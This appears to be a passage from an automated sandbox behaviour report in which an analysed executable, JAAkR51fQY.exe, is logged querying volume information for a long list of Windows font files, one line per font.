Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation			Jump to behavior
